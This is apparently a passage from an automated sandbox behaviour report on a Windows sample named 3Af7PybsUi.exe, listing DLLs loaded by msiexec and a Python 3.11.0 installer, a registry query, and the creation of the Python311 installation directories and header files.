Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: slc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: sppc.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exeSection loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msxml3.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: feclient.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\3Af7PybsUi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exeWindow detected: Number of UI elements: 43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python311.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python3.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\LICENSE.txt
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\NEWS.txt
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\py.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\pyc.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\DLLs\pyd.ico
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\python.exe
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\pythonw.exe
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\vcruntime140.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\vcruntime140_1.dll
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bltinmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\boolobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bytearrayobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\codecs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\complexobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\abstract.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\bytearrayobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\bytesobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\cellobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\ceval.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\classobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\code.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\compile.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\complexobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\context.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\descrobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\dictobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\fileobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\fileutils.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\floatobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\frameobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\funcobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\genobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\import.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\initconfig.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\listobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\longintrepr.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\longobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\methodobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\modsupport.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\object.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\objimpl.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\odictobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\picklebufobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pthread_stubs.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyctype.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pydebug.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyerrors.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyfpe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pyframe.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pylifecycle.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pymem.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pystate.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pythonrun.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pythread.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\pytime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\setobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\sysmodule.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\traceback.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\tupleobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\unicodeobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\warnings.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\cpython\weakrefobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\datetime.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\descrobject.h
Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\Python311\include\dictobject.h
